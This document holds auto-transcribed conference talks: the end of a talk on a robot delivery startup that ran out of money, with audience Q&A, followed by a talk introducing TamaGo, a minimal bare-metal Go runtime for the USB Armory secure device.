ended up going in the end was to have it more of like a driver assist type, like a parallel approach, parallel autonomy approach, where our robots would help people the same way that cars would help people stay in lanes or have cruise control or like with parking assistance. So that's kind of the approach we're having. I think long term, it is going to be possible to build a robot that's more autonomous, there are companies like Starship that have some interesting ideas about how to solve that. But I don't think it's quite something that can be scaled to every city just yet. Another really important thing is the lab does not equal the real world. So there were many, many great examples of fantastic research papers from some great groups and they were great with very polished, very clean data sets, but they did not work when you deployed them on 100 robots. They were all different. They all had slightly different camera calibrations, they all had slightly different hardware, they all had slightly different chassis. So it did not really translate as well. So these algorithms, these lab best case scenarios really need to be modified a little bit. What else? Yeah, one thing, maybe jumping back to the keep it simple, we decided to put in a very simple safety mechanism. So the robot actually breaks if it sees something within 50 centimeters in front of it. So it's kind of like a last measure precaution. As you saw before, there's a video, like you can supervise the robot from anywhere in the world with a lot of latency. But having this 50 centimeter like hard break actually saves us in case the robot loses connectivity or the supervisor is no longer able to supervise the robot. So it's always breaking 50 centimeters away from any like collision with like a baby or a car or whatever. So the approach we really thought about is like, how can we expand human potential? There's a lot of talk about like AI taking jobs or AI like replacing people's roles, but we sort of kind of try to do that and it didn't work. Like we try to build robots that were fully autonomous, that went from the restaurant to your door and that didn't work. People were waiting a really long time, these robots required an insane amount of maintenance. So we ended up going for an approach that was far more parallel autonomy where these robots were like helping people to do more. Same way the supervisors are getting these assistive technologies where they're able to just like set a waypoint to do the path planning and the robot does the motion planning on board. We also had the couriers who would just load food into the robots instead of the robots picking up food from the restaurant directly. So really expanding human potential, I think that's where it's at. And over the course of the past century, we've seen a lot of examples of this. Like we've seen operators of elevators. Like before elevators had operators who would make it go up or down, and now they're fully automated. And switchboard operators who would like connect phone calls, now we can make a phone call to anywhere in the world instantly for free. So we're seeing this transformation of work and transformation of the way things are done. And I think this is just the start. The way I see these robots is really meshing into the fabric of our societies and solving physical transportation. Like sure, you can move bits from anywhere to anywhere in the world, but can you move atoms? It's really expensive to do that. It's really hard to do that. That's where I see robots expanding human potential. So conclusions. What we did was really cool. And I think it was a cool experience. One thing that we realized is that tech is in the hardest part. We spent a lot of time figuring how to build something, but figuring what to build is sometimes very important as well. And I don't think we spent enough time asking ourselves that question. We kind of went in all sorts of directions. We didn't focus as much on making the best product possible. We kind of tried things that were really weird and not well thought out. So having that more long-term thinking, thinking what should we build is very important. Because how you can just look up a tutorial on Google and figuring out how to build a robot is not the end of the world. One really important thing for us was interaction. So interacting with people, figuring out how to make the door open when you actually receive your food, super hard. That's super, super challenging to do. Or actually, the only robot that opens the door for you, other companies like Starship, for example, they have a button that unlocks the solenoid. So it's like the experience is not quite there. You have to bend it down and you have to figure out if the door actually opens. So we spent a lot of time, a lot of effort in order to optimize that experience to make it as smooth as possible for people. So one thing we didn't figure out is financing. Come back to that in a second. That was really, really hard to do as well. So tech, not the hardest, financing, figuring out how to manage cash flow, super important. But I think the most important thing is to work with a great team. If you're going to be spending a lot of time with people who you eat, live, and breathe with, it's really important to choose a team that you really connect with and that share the same passion as you do. Because you could be miserable, making an amazing amount of money, but if you're with a really crappy team with a high turnover, it's really boring. I was really fortunate to work with one of the best teams in the world. And over the course of the past two and a half years, we managed to do quite a lot. And just last month, we actually got an article in the New York Times. So it was a really big accomplishment for our team. And we got to share it with our families. My mom was really proud. So a lot of great traction and a lot of great coverage. But unfortunately, we actually ran out of money. So we ran out of money last month. And we are no longer delivering things. So I decided to leave and start my own thing. Instead of doing robots, I decided to do data. So now I'm actually focusing more on building a tool that helps you tell stories with data. So this is Glint. This is a data storytelling tool. You're able to drag in some files. And it tells you the story of your data without you having to write any code. So my hope for this is to allow anybody in the world without any knowledge about how to wrangle data, how to clean data, how to analyze data, to be able to tell stories with their data directly from their computers. I'm managing a tool where you can say, oh, in December, there were XX visitors to Congress. Or last summer, we had XX sales. And it automatically filled that for you. That's kind of what I'm thinking about. If you want to join the effort, there is GitHub. I'm more than happy to have any contributors. And if you have any questions or comments, more than happy to answer on Twitter or here in person. Thank you. So as usual, feel free to line up in front of the microphones or I'll ask you a question to the signal angel over there, the Rezia Azwan. It's all the way down. Go ahead. Okay. Here's a user for your service who apparently got an email from you that announced some changes. So he's wondering what you're planning to do there, whether you're continuing your service or closing shop. Yeah, it's unclear. We ran into funds. So I think the CEO is still trying to figure out what to do with that. I wish him the best of luck, but I ended up leaving with a lot of other people. So we had like 50 people in November. Now we have like 10 people left in the company. So it's very ambiguous what's happening, but yeah, I'm, I left. Yeah. Hi, Krofone. No audio. Ah, okay. Now it works. I'm a little bit confused because you are presenting a 1970s concept of a manipulator because a robot is something that works by itself and manipulates somebody who has some joysticks and moves things. So it's nothing special. You just have an internet link for a manipulator and in the 1970s there were cables. So what's the special thing? Yeah, that's a good question. I think the magic here is connecting everything together, figuring out first of all how to build these robots, how to build a reliable connection and how to build a platform that works. And as I mentioned, like the how, that's not that interesting. It's more of the what you build. Is that experience where you're able to order anything you want and anytime and get it delivered in under 30 minutes virtually for free? So for example, evil people could just buy a remote control car, put a bomb in it, drive under a police car and like boom. It's the same use case. You deliver something. Is there another question there? Yeah. Hello. You talked about iterating quickly and rapidly and that's a very good model for conceptual stage and software. Were you in the stage where you were leasing your hardware with your iterations? Because usually a big stack of certification has to come in between. So I'm not entirely sure. Are you asking if we got certified at every single release? I suppose yeah. What level of like recertification was it totally released so you had to meet like regulations? For each iteration? Yeah, absolutely. We didn't really get certified because we're not building hardware product for consumers so we're not selling it to anybody. We're operating it ourselves so we don't fit under the same kind of requirements. However we did have to have some permits and part of the conditions of these permits was that we had to meet some expectations but they're very, very basic and they weren't rigid like an FCC or a CE certification for example. That was the question. Yeah, thanks. Thank you. Yeah. Another question from the internet. Why did you develop different applications for Android and iOS? For the consumer application? I haven't got any more details. We just did. I mean we had first an iOS application. I mean 80% of our customers were using iOS so we really spent a lot of effort like polishing that iOS experience, making sure that worked. And at one point our Android app was working super badly so we decided to kill it and everybody was really, really pissed off, extremely pissed off. So we actually reintroduced it and we started catching up with features to the iOS version. Internally all of our apps were built in React and React Native so we had like a common framework for all of our internal apps but we didn't have that experience. We're expecting the quality of the experience that we're expecting from a consumer app using React. That's why we had two different code bases. Yeah, on the right. What are the different methods regarding perception, for example, LiDAR, radar and what are your conclusions from that? Yeah. We tried LiDAR. We tried the cheap LiDAR. We didn't try like a really high-end LiDAR. So the challenge with having like point clouds is that you have to compute, you have to spend a lot of time computing. We were using a relatively low-powered device and it was running from batteries so we didn't have the luxury of having like 10 GPUs in the trunk of a car, for example. So that was one approach, one question. Another question is how much does it cost? So LiDARs, they can cost $10,000, $100,000. Our bill of materials was around $2,500. The last version was $2,500. So all of our sensors were very minimal. In terms of what sensors we tried, we tried a lot of different sensors. We tried intrusonic sensors. We tried near-field infrared sensors. We tried other sensors. We tried a lot of different sensors. We ended up just going with cameras. So we have cameras. We have six cameras on board, all of them are like full HD. We stitched them into an image on our compute module and then the supervisor decides which portion of the image they want streamed so they can manipulate with their keyboard to see which portion of the image is streamed. So we don't stream the whole image. We just stream port of it. The really important part for us was to make something that's viable that can be used commercially. So I'm sure LiDAR is really cool, but I'm not seeing any commercial deployments of LiDAR-based Thomas vehicles or robots yet. Thank you. Yeah. Yeah. You have tried out many different concepts, how to do it, and you saw that your company ran out of money. Do you still believe in the business concept of robots delivering packages of food? Who knows? I think it was a great learning experience. We learned a lot. We had a great team. And I think we'll see some concept of robots, maybe not exactly what we were building, maybe something a little bit different. But I think it's a little bit inevitable, especially with the rise of self-driving cars. Maybe we'll have cars delivering packages instead of robots. I'm not entirely sure what it would look like. I could tell you Amazon, they bought one of our competitors, Dispatch Labs, so they're making a big bet on this. There are two delivery companies in the US, Postmates, and DoorDash that are building products internally also with delivery robots. And also companies like FedEx are also building delivery robots. And then we have companies like Starship, for example, which are building robots and doing B2B with companies all over the world. I think we'll see some form of delivery robots. I don't know if it's going to be what we had or what somebody else is going to have. Whether any safety certifications you have to satisfy in order to operate around people? No. So the thing is in the US, it's kind of just do whatever you want. It's very different from Germany. You can kind of just do things and you can do them until you get in trouble. So we kind of had that approach, don't ask for permission, ask for forgiveness. We ended up having to have a permit in the cities we operate in, but it was very simple. It was like, okay, you have to have lights, you have to have a phone number, and you cannot go in these areas. That was essentially all the authorization, all the permitting and certification that we had. Yeah. I wanted to ask, did you try other markets? Like autonomous drive is very hard, even way more to manage it fully. So like perhaps elderly care, like you could use these robots in elderly care where you have a controlled environment where everything is the same. Did you search after other markets where it's less? Yeah, it's a great question. Yeah, there is a lot of potential for markets like elderly care, for example, also for mail delivery, for applications inside of factories. We had a couple of different medical companies that reached out to us and were like, hey, we want to move items, move packages inside of our facilities. So we did have a lot of interest. We try to keep a focus on the consumer space, like really building a consumer experience that worked out before branching out into these more B2B approaches. But yeah, elderly care could have been one of them. I think one important thing about elderly care and services like meals on wheels, for example, is that human contact. So I think people who are maybe not seeing as much of their family, of their relatives, they really cherish that connection they get from the people who deliver them food. So I think it's a multifaceted approach they have to have. You have a couple of different considerations with these kind of services for the elderly, for example. What kind of personality do Chinese entrepreneurs have? I think, as I mentioned, it's really important to have relationships. So they were very interesting. They were very deeply in belief of their government. They had nothing bad to say about it. They believed that it would bring them everything the best possible, even though they still try to access Facebook and Twitter with VPNs. So they were very, very loyal to their government. They were very, very diligent. If they committed to something, they would usually deliver on that. They really wanted to make sure you had a good experience. And also what we saw, for example, with building up these relationships like the first few times we talked, they would try everything to impress us. So we got taken to these ridiculously expensive restaurants to make sure that we were welcomed well and make sure everything was right. Actually, I had an interesting episode earlier this year. I was going to go to Burning Man, and then all of a sudden one of my colleagues had an argument with my manufacturer about whether Hong Kong is another country or not. And I ended up having to go to China to deal with our manufacturer instead of going to Burning Man to make sure we're aligned in terms of our beliefs. Sometimes it's really delicate. You cannot talk too much about the government there. You can't talk too much about politics. It's best to stick to business and focus on building a product. I guess this was it. Thank you so much.
Over the past 2 years we've been building delivery robots - at first thought to be autonomous. We slowly came to the realization that it's not something we could easily do; but only after a few accidents, fires and pr disasters. We've all seen the TV show Silicon Valley, but have you actually peered underneath the curtain to see what's happening? In this entertaining talk, Sasha will share his first hand experience at building (and failing) a robotics delivery startup in Berkeley. Over the course of 2.5 years this startup built hundreds of robots, delivered thousands of orders, and had one robot stolen. The talk will look over the insanity that's involved with building an ambitious startup around a crazy vision; sharing the ups and downs of the journey. It will also touch up lightly on the technology that drives it and the simplistic approach to AI/machine learning this company took.
10.5446/53200 (DOI)
The first time I met our next speaker was 12 years ago at a conference in Berlin that Shell renamed unnamed where he presented an automotive car hacking talk before it was called car hacking where he injected RDS traffic and could reroute your navigation system. Luckily, he's no longer breaking cars but instead went on building secure stuff. And for one of this, the USB armory that you might have heard of, he has now come up with Tamago, a full bare metal go runtime for your secure software development needs. Please give a warm round of applause to Andrea Baridani. Thank you. Can you guys hear me? Yeah. Okay. Thank you for the introduction. Thank you for reminding me how old am I? And yeah, so we still break cars but just we, that's work now and not fun anymore and the fun stuff is actually this one. But we still break cars actually. So I work for F secure, just a little bit of introduction by myself. I work for F secure and some of you might know me for a company which I founded which is called Inverse Path which was acquired a couple of years ago by F secure. I'm one of the offer of the USB armory and yeah, as it was mentioned introduction, I work a lot with hardware and embedded systems on safety critical systems such as airplanes, cars, industrial systems and so forth. And because I'm getting old basically, now I tend to like to build things, to make things rather than only breaking them. I think this is a inevitable phase in the life of information security researchers and because you get a little bit tired of just pointing your finger at things that are broken and at some point the industry becomes so good at breaking things that I think that we also should stop a little bit and think about creating tools hardware and software which can really serve the non security community better into solving all kind of security issues because we see that there are a lot of issues that they never change despite the fact that we'll almost in 2020. And one of the motivations for us into building open hardware such as the USB armory and Tamago which is directly linked to the USB armory as you will see, it's also to provide better tools tools that are maintained that work that are clean that are trusted. And I think this is a phase that a lot of information security researchers at my age now are getting through which again is just a guess getting old. So the USB armory is an open hardware computer which is meant to be a secure enclave in a very very small form factor just a USB device and Tamago is based on our need to build software in a better way for this device. So the whole inspiration comes from the journey of creating this hardware. And it comes from a very simple scenario that we face while testing all kind of embedded systems. So I'm a strong believer of the fact that just like natural language, I mean, if any of you want to code for a specific device in whatever language you like and you prefer, you should be able to do it. And if that language for some reason, its implementation generates a compiler which is not fast enough for you to have a successful project on any piece of hardware, that is not necessarily your fault or it shouldn't be your fault in choosing the wrong language. It shouldn't be any wrong language. The language should be adapted to your need, to your style. As a programmer, as a developer, we should in an ideal world care or not care at all about how the compiler is optimized or not. In an ideal world, all compilers should generate machine code with the same efficiency. If you like to do math in SQL queries or in Rust, Python, assembly, whatever, in an ideal world, like a Star Trek, you should all generate the same byte code because the intention that you're giving to the code remains the same. You want to do the same operation. However, we do not live in an ideal world. We live in a real world. This means that developers, to make the choices that they need to make in selecting framework and languages, they really need to be careful about the implementation that the language is reflecting, the implementation that the language is supporting, that the hardware that it is supporting. This is not ideal. Usually there are very two distinct scenarios. We have hardware, we test hardware for a living that has lower specifications microcontroller units, which are used because engineers want to simplify their design or they want to save money on the parts, whatever the reasons. The only practical choice or the only real world choice for programming on these devices in a product production system is by using unsafe lower level languages, which is typically means mean C. We tested in our cryptography tokens, wallets, hardware diodes that play a very important role in ensuring separation of safety boundaries on things like cars and planes and all your lower specifications, IoT and smart appliances, they all have firmware that despite doing operations, which are pretty basic, they're all written in a language which is unsafe from an implementation perspective. On the other hand, if we have hardware with higher level specifications, we can code in pretty much anything we want, but we need the support of a complex operating system to do that. If we have a system on chip and we can run Go, Python, whatever, higher level language on it, we're just shifting complexity around. The complexity and the, let's say, unsafeness is taken away from us as a programmer, but it's distributed everywhere else in the stack that allows us to run that code because we're going to have a Linux system, we're going to have a lot of drivers that maybe we don't want, we're going to carry on millions of lines of code that are not strictly necessary for the task that we're doing. As we know, complexity is an enemy of security. If I want to program a system in a higher level language, I just don't want to put all of that complexity under a carpet and have it there running underneath me. I just want it to go away. As a security person, that's the reason why I pick a higher level language. We face these two scenarios and none of them is ideal. Also, in this case, now we see a shift toward system on chips away from microcontrollers, also in avionics, in any kind of system which needs to be a little bit more complex, your home router, higher specification IOT and smart appliances, and we also see, which is quite common, that despite having this power and the underlying OS, we still see C applications running in user space on this system. Your infotainment system is very likely to do that even if there's no good reason for doing so. We pop them all the time because inevitably C is a hard language to code with. We should realize that no matter if you're a C lover or not, it is now vastly proven that it is very difficult to have production grade code done by a lot of developers to be safe because it just takes too much toll on the effort for making it safe. Our penetration testing rate on this kind of system is always 100%. As we built a system on chip-based hardware, we didn't want to face these situations. We didn't want to write bare metal code in C, and at the same time, we didn't want to have our higher-level language applications running under complex operating systems. Our goal in doing this is to reduce the attack surface of embedded system. We don't want to carry millions of lines of code that we feel are unnecessary. We want a system to perform only the bare minimum of what we need to do, and we think that this can be done by removing any dependency whatsoever on C code or complex operating systems. We want to avoid shifting complexity around or having complexity hidden from us. We want to run a higher-level language such as code directly on the bare metal, and that is the motivation for Tamago, which is directly inspired by creating the USB armory in the first place. Now, of course, a lot of you, I mean, I would assume that some of you know Go here, and a lot of people are thinking, why not Rust, and we're going to get to that. The point here that we're trying to make with this project is why not both? We want people to have the choice of using the language that they want. And since we want to use Go, that's why we created this framework. So why Go? So first of all, disclaimer, because I know when we enter into these topics, there's a lot of frameworks. People have feelings. I have feelings. You have feelings. Everybody has feelings about languages and so forth. So this is not a talk about saying that language X is better than language Y. I'm not here to say that Go is better than Rust. I'm here to say that we think that certain languages which have less of a chance now to succeed on bare-metal applications, they can have this chance. So we want the ecosystem to be more diverse. And this is why we made this effort. But it's not to say or to force you or to tell you that Go is better than Rust. In fact, we want you to have the choice and want to give a choice of Go, which wasn't present in the past. So if we look at speed versus safety access, so to speak, also this is not to scale. If you know Rust, if you're in a lobby in Rust, you might decide to place the R of Rust in a different location on the chart. And this is absolutely fine. Again, this is not to scale. Scale is objective here. But we all agree that if we would draw a line, Go is something which is, of course, slower than Rust in its end result. But it's easier to a certain extent to learn. The learning curve is certainly easier, more shallow on Go than on Rust. Rust, of course, is much better than C. Of course, it's a safe language. And if we go on the other side of the spectrum, we have C, which gives you more control, more hardware control. But it's also hardware to implement correctly. And now we are in a situation where languages like Go, which are fairly fast, and they're much faster than languages such as Python or Ruby. So they can really be used to create binaries that run on the meta systems. However, they're a little bit detached from the hardware. So if you want to either run on the bare metal or make firmware at a slow level, they're not ideally suited for now. So we want to somewhat fix that, at least for the Go language. And one of the reasons why we want to do this is because this is the typical setup of a secure firmware that we make for other USB armory or other kind of meta systems. We have a boot loader, which is secure booted by the hardware, by the system on Chib. So we have the first stage authentication of the boot loader. And then typically the boot loader authenticates and loads a Linux kernel image because that's the operating system that most people use. And that's the operating system which bootstraps the whole decryption procedure for, let's say that you have an encrypted partition and so forth. And maybe it has drivers, it communicates with the system on Chib to get some key material, uniquely derived from something stored only in that chip. So this is a typical chain of secure and verified boot to achieve authentication of all of your code and also confidentiality of the data. And the problem is that we're typically faced with a scenario where we're developing something, let's say a cryptocurrency wallet or whatever crypto related firmware. And now we code it in a language like Go. And we have very few lines of code in Go, a few thousand lines of code. We use a standard library of Go for everything, for TLS, for crypto. So we minimize the first party dependencies and we have code which is clean and nice. However, in order to boot this image on something like the USB Armory, we need to carry around a Linux image to do fairly simple tasks such as decrypting something, talking to the system on Chib, doing USB and then launching our Go application. So in the end, to us, it's kind of an elegant, the fact that we spend so much time simplifying and cleaning up the code of the firmware and then we need to carry a giant operating system compared to what we need to do. And we need to update it very often because despite the fact that you only have a few drivers exposed, you still want to keep it up to date because you never know. But of course, you also have user space tools which mean you can try to reduce them as much as you can. You use Busybox, you use Framework for generating compact Linux images such as Buildroot and so forth. But still, it doesn't feel the right thing to do. This could be more optimized. And while this is an example for the USB Armory, it applies to pretty much all kind of a meta system that we test and have some sort of security and so forth. They all follow the same pattern we're using a system on chip. So what we really want to do is take Go and move it down there on the axis. So we want to keep the same ease of and speed and efficiency in development, but we want to have more hardware control, which also means that we want to kind of remove this red box over there. We want to take away the millions of lines of code that we don't own, that we don't maintain, that we're kind of stuck with. So this is the idea of Tamago. So of course, this is not a new concept. This is known as unicurnals or library operating system, which are single-dressed images which typically run under the bare metal. And their focus is to reduce the attack surface. The problem, however, with available unicurnals is most of them, not all of them, they're also called fat unicurnals because, so first of all, a good chunk of them is just, again, hiding complexity for you. So there's a good portion of unicurnal projects that they give you an API and documentation and they tell you, look, you're going to develop your application, you're going to compile it, and then that's going to be executed. But in the end, they do have an actual kernel underneath, which sometimes it's even derived from fairly complex operating systems such as NetBSD and FreeBSD, and the whole framework just puts a lot of abstraction layers in the middle so that you don't see the kernel, you don't see the runtime, and you just deploy your application. Now, this is all well and good, but from a security standpoint, this doesn't really solve the problem. In fact, I think it creates the opposite problem. So while researching for this talk, I kind of looked at all the unicurnal projects that are around, and for most of them, it was really hard to find which kernel they were running. And the documentation kind of gives you the illusion that there are these magical bare metal projects, but they're actually not. A lot of them, they just pull in code from NetBSD or FreeBSD. Most of them, they are based on for-party kernels such as MiniUS, which is granted, it's written in C-Steel, but much shorter and smaller code base, that's something like FreeBSD. And also, most of them, they are actually not focused on the bare metal in the sense that they're not focused on running on embedded systems, but they're focused on running on the cloud. And so they all support hypervisor, such as Zen, which is not what we want to do on embedded system. So for all of these reasons, the existing, most of the existing unicurnal projects, they're not really suited for embedded system developments, and they don't achieve what we want to achieve, which is kill C. I don't want any dependency on C written code whatsoever while having my firmware running. And if I'm going to have a hypervisor, or if I'm going to have a kernel written in C, you can abstract that as much as you want, you can hide it, but it's really not going to solve the need that I have. So this is really not what we wanted. The other problem is that when it comes to security, these unicurnal projects, and rightly so, they want to support arbitrary applications. So they want you to be able to compile your application in whatever language you want and then to execute it. Or they also want to be able to be kind of OSs and then provide support for multiple applications. But the thing is, if you're having multiple applications and different trust domains under a unicurnal, or if you're running an application which is written in an unsafe language like in C, you kind of want an industry standard OS because you kind of want address space, layer randomization, you do want stack canneries, you do want all of the security features that are the good parts of complex operating systems that are there for you. So we think in our approach that unicurnals such as this one, so at least we are interested only in unicurnals that allows us to run bare metal on embedded systems and we want to run a single higher level language on that unicurnal. We're not interested in everything else because for everything else we think that actually maybe operating systems are a little bit better. So we don't want to focus on the cloud, we don't want to rely on an iProvisor. And again, I explain why we choose Go, it's what we use a lot and so we wanted to give Go a chance because we think it has a shallow learning curve. So productivity can be very good with Go and also primarily it has a very strong cryptographic library that we want to use. And again, Rust has already proven that it has a role in the bare metal world. So it has nothing to prove and it's going to succeed as well. But Go doesn't have the chance and that's what we want to give to Go, this chance because we think it really can and we're going to see why. So in a nutshell what we're going to try to achieve because the other message of this talk is that it's important how you do it, not only what you do because anybody can run Go, anybody can understand that with the right effort you can put Go on the bare metal, it's fine. But the problem is how do you achieve that because there's an element of trust there. So and we're going to get to that. So Tamago is the idea is that we want to find the path of least resistance in patching the Go component. So we want to find a patch which is absolutely minimal to cleanly enable support on the bare metal. So our take is to provide a different OS variable to Go. So normally in Go you have Go OS to specify whether you're under Windows, Linux or other operating systems. So we created a separate Go OS support and a minimal patch to enable that on the ARM architecture so that we can run the runtime on bare metal. So this is one part of Tamago. The second half is a set of packages that provide support for hardware boards, so the driver so to speak. So right now we have support for the USB armory system on chip which is actually a widely used system on chip so not just specific to the USB armory which is a member of the NXP IMX6 family and we're going to target more platforms in the future. And our goal for doing this is again to develop security applications using the existing open source tooling that we have for signing secure boot images and so forth for the USB armory. So there have been similar Go efforts in the past and there are similar Go efforts right now but for a variety of reasons they all didn't quite fit what we needed to do. So we had two projects mainly which are now maintained. There was a project called Bisquit which wanted to actually create a kernel OS kernel in Go. So the idea there wasn't just to support Go application but to support any application written in any language with POSIX compliant interfaces and so forth. This is a maintain. There's a lot of complexity to the project because they would do memory allocation and threading and so forth and they jacked the existing Go OS Linux support despite not running in. So for these reasons it wasn't exactly what we were looking for. There's another project, a maintain which is called GERT which is an ARM adaptation of Bisquit for running actually only Go applications again in a JacksGo OS Linux and has more complexity to it than what we want. So that's also something that is not suited for what we wanted. There's another nice project called Atman OS which was presented I think three years ago which is kind of similar to Tamago. However, it targets the Zeni provisor and has limited runtime support which is also something that we don't want. Now of course if you like Go, if you know a little bit about the ecosystem, you of course might know about TinyGo which is active and rocking. It's a great project. However for our purpose, TinyGo is not quite what we wanted because it's a complete different re-implementation of the Go compiler. So it's a different compiler, not the original one and because it targets microcontrollers and not system on chips, it provides a different runtime with a more limited language support. So it's not quite like Vanilla Go. So it has a different focus. And then Brand New which was actually published a few days ago. We have Embedded Go which is kind of a new project which targets also microcontrollers and the FUM architecture. So it actually adds new compiler support for it because RMV7M is not native to Go. So it adds a No OS, Go OS for the FUM architecture. So again, it does something a little bit different than what we do but it's actually quite interesting project so we're going to keep a close eye on that. So all of these projects, despite whether they are maintained or not or whether they are complex or not and they do what we like or not, they really helped us improving that this can happen. So throughout our project, our approach to it is not that we needed to understand if this was possible. We just needed to understand if this was possible without polluting the compiler, if it was possible to do cleanly enough. And all of these projects just gave the assurance that this can be done. So we're really grateful to all of the people that put their effort into these projects. So I'm working in information security so to us and we are kind of entering, for me, at least entering in a territory which is just compiler and languages and so forth. So it's really a new domain for us but we want to bring over our core principles which is enabling trust. And we see that there are a lot of projects, most of Unicernar projects, it's something that you would never see in production, really nice, like from a technical perspective, they are really people that they do something, they believe in, they have passion and they push the boundaries of technology. But are you going to find those in production? Well, not so much. So we want something that is done in a minimal, clean and trusted way that is good enough to be eventually accepted upstream because that's our final goal. So we wanted really to find if we can, if we can patch the original compiler in a very minimal way and much of the effort has been placed in that. We didn't want to pollute the go runtime to levels which we think are security people that are unacceptable. Less is more. That was the motto of our effort. We want to have the least number of modifications, still readable of course, that it would make sense so that we'd match the existing style structure of the way the Go development team is working because also this leads to code which is more verifiable and it's more maintainable in the future. So we designed it for an hypothetical upstream inclusion in the future. So we're working for that and we have a commitment to always think against the latest Go release. In the end, we ended up with about 3,000 lines of code of compiler changes and that's it in order to support runtime and enable the additional Go as architecture. We placed strong emphasis on reusing code which was already there within the Go compiler framework and the final goal is for developers to be able to use this just by having one import in their code and that's it. If you don't need to use the hardware, you don't need to know about the hardware. And we want to support unencumbered Go applications like no limitations, ideally zero limitations in the end. And also the compiler is only half the story. We provide drivers so you can actually run this on hardware which these days is relevant. And by using also the original Go compiler, we do inherit nice properties such as Go compiler itself hosted, can compile itself, has reproducible builds, so these are all nice things that we do want when creating our firmware code. So we have three different categories of Go compiler modifications that we've done. We have what we call glue code which is merely code that just adds the Tamago keyword to a source code that needs to be compiled. So this code has no logic, it's very benign, it's just stubs and definitions where we say there's a new architecture and it's named Tamago and so we update all of the lists which are required to enable this support. So this is about 350 lines of code across many files. So we change many files but the changes are really, really tiny and really, they have no impact whatsoever on the stability or security of the code. Then we have a second set of changes which is the bulk of it which is about 2,700 lines of code which is reusing existing code within the Go runtime for execution on the bare metal. So I'll give you an example and this is what I call the Go Frankenstein because it was like creating a Frankenstein monster but it's much better than what it sounds. It's not exactly as Frankenstein, it actually works. So memory allocation, a lot of projects that try to put the Go runtime on the bare metal, they completely reimplemented memory allocation of threading and we just saw that there's the memory allocation for Plan 9 which is included in Go runtime and Maintain and with one line changed we can use that to run on the bare metal because at some point a Plan 9 memory allocator just used the BRKs he's called to allocate memory but we're running on bare metal. We have our memory space so we can just allocate pointers from it and so with one line of change we can use all of that code which is right there, test and maintain. For locking, structure and so forth, there's a locking code within Golang which is for the WebAssembly primarily and we can reuse it identically and the nice thing about this code is that it has three functions which hook into the external OS and we're going to use those to implement proper timer support and the nice thing is that we can keep a clean separation between what we need to do to run things on the bare metal and what Go already has within its code and it's nice to do that rather than just hacking and changing Go code. It's nice to have nice entry points for doing things which touch the hardware a little more. And then we have an in-memory file system for now but this is going to change soon in the next month because we're going to add MMC and FAT support which is actually quite easy to do but there's an in-memory file system with NAC which we just copy over. We enable it for Tamagotin works. This is actually the bulk. There's a lot of, there's the highest number of line of codes change because of the way the compiler works we just need to copy the mem underscore plan nine dot go file into mem underscore Tamagot in order to use that code. And then we have new code which is about 600 lines of code in 12 files which is Tamagot specific functionality and it mainly provides initialization of the ARM core so this is all code which is fairly standard you will find it in any OS, any bootloader and so forth. And then we have code which provides hooks with your application and the board package to understand how big is the memory and what's the offset of the memory and so forth. So all of the changes like surprisingly it was really surprised to us that the Go runtime is almost freestanding on its own with not a lot of dependencies on the actual operating systems apart from system calls that we're going to see now. So this is the extent of the modifications that we need to do to run Go on the parameter or at least to have a compiler which allows us to do that. This is the memory layout that we use so your Go application lives there in memory. We have a heap, stack, and an intervector table and so forth so all of this is pretty standard and we use all the available RAM depending on the board that we have. So because only Go runtime supports so basically there are three components here. We have the support within the Go runtime itself so this is an example of what happens in the file os.tamago.arm.go and we see that we have hooks, we have variables and functions which needs to be defined externally by the application. So we don't want to put information about all the different boards, all the different hardware and the hardware peripherals within the Go runtime. We don't want to pollute it with that. So we have one generic function for hardware initialization, we have a function for printing on the console and we have a function for getting random data and for getting ticks which the runtime expects the external board package to provide. And the same goes with the offset for the RAM for where memory starts, what's the offset and what's the size. And then the rest of the coding in this file is just architecture related initialization so not specific to a board but just ARM initialization and so forth. So this is part of the Go compiler modifications. Then we have the system on chip package which is actually very simple because the only thing that it provides right now is in relation to hooks with the runtime, the variables where the memory starts and the offset of the stack. And then we have the board package which actually tells what's the size of the RAM because the start of the memory is going to be the same for the A specific system on chip but if you have different boards you might have more RAM so the actual size is specified in the board package. And so for instance here in the USB ARMory package we say okay when I want anything to be printed out on the console, the console for the USB ARMory is actually the second UART, the second serial port. So that's information belongs in the USB ARMory package. So this allows us to have minimum modifications in the Go runtime to have what belongs to system on chip specific information in the system on chip related package, in this case the IMX6UL package and any information that's specific to the board we have it in the board support package so in this case the USB ARMory. So this is the clean way for doing it. Another example here so here we have a timer definition so within the Go runtime at some point Go needs to get ticks or to understand what's the time and that's provided externally by the IMX6 package which provides support for the generic timers for the USB ARMory because that's what the architecture provides and we can also of course mix assembly when it's required. This is something that already happens in Go, it's not something that we're doing only ourselves, it's something which is common and accepted and it's the most efficient way to deal with very low level aspects such as getting timer information. So all of this is initialization code which accounts for about 500 lines of code so not so much and again it follows existing patterns in the Go runtime. So this is another example here we are at some point so we were developing and we saw that code was running slower than expected and we were like oh wait a minute we need to change the clock speed because this system on chip by default is clocked at about 400 MHz and if you want to run it at full speed at 900 MHz we actually have to do it ourselves like the bootloader doesn't do it, the bootloader always sets the default frequency and so we quickly coded in Go within our system on chip package the function for setting the frequency and this is what a driver looks like in Go so we have our functions for setting registers so here we set the PLL register, we set two bits to zero at this offset, it's kind of what you would find in C but you know just by using Go we can wait for a value to become one because we are waiting for the lock on the clock, here we are removing the pipas that we needed for changing clock, we set a divisor and so forth so you can write drivers in Go and the interesting thing about when using memory safe languages on the bare metal is that every time you need to do something which is not safe you have a specific keyword for that so in Go like in other high level languages you have the keyword unsafe so if you want to scout and look for all of the potentially dangerous places in the code where you are doing something which is pointer arithmetic you can just grab for it, you can just search unsafe and you are going to find all the occurrences and where you are using the finding or doing pointer arithmetic and because you do need to do that for drivers but at least it's very easy to identify those within the code, that's also something which we thought was really nice about using a higher level language such as this one. Concerning C-scales, the Go runtime makes direct use of C-scales for a lot of functions and this was our main concern, do we need to emulate and about 50 system calls in order to have the runtime working and it turns out that only one is actually really needed which is write which is the one that eventually gets hooked with the printK function so now we support the write C-scales only for standard output and standard error and we use that to print to the console because that's the only thing that you actually need on bare metal I mean you are either writing on a file descriptor which is handled in a different manner within the Go runtime with the file system but if you want to write to standard output I mean on these classes you don't have a screen so you have a console and that's what we do in the board package and if anybody wants to do something different with that in the board package which again is outside the compiler you can define whatever printK method you want. So in the end this is what it looks like so normally you would have your Go runtime running under user space under a complex OS the Go runtime would make system calls and then the kernel space with its drivers will be able to serve them talk to for e-files and so forth. With Tamago we live in a Go runtime process your package is linked with the runtime the system on chip and the board packages are also linked and these are the ones that support the driver and the Go runtime every time 